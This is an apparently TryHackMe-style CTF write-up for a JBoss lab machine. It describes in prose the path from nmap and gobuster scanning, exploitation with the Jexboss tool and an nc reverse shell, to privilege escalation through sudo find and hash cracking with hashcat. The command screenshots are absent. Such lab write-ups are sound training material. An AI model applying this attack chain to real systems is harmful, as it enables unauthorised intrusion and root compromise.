Difficulty: Easy
So before we start there is a few things I want to mention.
1: The first part of these tasks are mainly reading, the answers are literally right in front of you. So we will instead start from Task 3 “Reconnaissance” where we start actually running tools and getting outputs.
2: In Task 5 “Exploit!” me and many others could not get this to work so instead save yourself A LOT of time and trouble, instead get the Jexboss tool from the link below.
Jexboss: https://github.com/joaomatosf/jexboss
With that said let’s start!
Firstly our good ol’ nmap:
Okay well that’s a fair few services so let’s wait for nmap to complete fully and investigate some of the outputs:
Well we can see what service is running on port 8080 and we can safetly assume the “Front-end” application running is that found in the “http-title”
We also have another web server running on port 80:
We can see from the title it will most likely be a blog styled website so let’s first check that out!
Well one thing I noticed is the question in Task 4 “Find Tony’s Flag” clearly states about having an unbiased opinion.
And first thing I noticed here was a reference in the first post to a possible biast opinion, so I want to check out that first initial post I can see.
Upon looking down the post I see an image, now if you remember from the room’s tags it has steganography and cryptography so we know coming into this we will need to be somewhat familiar with these to be able to complete this room:
It also hints to anything that could allow you to hide data inside such as image files, and so I want to get this image and examine it further:
Now we have that let’s run a few things here on this.
The one overlooked and probably easily forgotten command to use here is “strings,” this allows you view printable and potentially readable strings essentially.
So that will be where I should check first before heading to steganography tools and potentially missing interesting information:
Well sometimes it seems you will just get a lot of useless jargon, but in the instance of a CTF it can also have other things like perhaps tony’s flag?:
So now we have that we can approach the next frustrating task, Task 5 “Exploit!” So I will assume if you read the beginning you already have git cloned the Jexboss tool and it’s ready to use.
With that said let’s continue!
At this point I want to run gobuster on both port 80 and port 8080 of the webservers to see if we can find anything additional.
Well we found additional directories but nothing that was of interest so to save you time from digging in all the wrong places.
Let’s move on with the exploitation using jexxboss:
NOTE: This was a little fiddly and I had to run this a few times for it to obtain the shell.
Something I thought was kind of neat here is they give you the command for a bash reverse shell so you can simply setup a nc listener, execute the bash reverse shell and work from there instead of within this python script.
So let’s do just that and send ourselves a bash reverse shell:
Great! Now we can work from here to do our enumeration to root and get the flags along the way.
Firstly upgrade the shell:
Then the users:
Then the system-wide crontab:
Nothing interesting here.
The sudo-l command:
And we cannot use sudo -l as we don’t know this users password so let’s check out the directories of the other users.
First we are going to start with jboss:
We can see 2 files here, 1 called “note” and another called .jboss.txt that’s hidden.
So let’s check out the hidden file:
And we have the Jboss user flag!
Now to check the note:
Okay cool! We got a password for the user Jboss so with that in mind we can now su as jboss:
Awesome and we are now the user Jboss, now to try doing sudo -l which we could not do before:
Okay so we have find here able to run as root and without a password, so can you guess what we do next?
That’s right!
To GTFOBins and see if we can find a sudo exploit for the find command:
And we find one! Now to try and gain root!
And now we are root we can gain the last flag located in /root/root.txt:
To me this looks like a base64 string so let’s use Base64decode.org to decode this:
And we have what looks like a hash, so let’s use hash-identifier to find out what the possible hash could be:
And we can see it is very likely to be a MD5 or MD4 so with that in mind let’s try to crack this with rockyou.txt and hashcat:
And we get a match back and our final root flag!
And we are done! Congratulations and thank you for reading!
Please feel free to follow me on twitter if you like the write up: https://twitter.com/amec0e
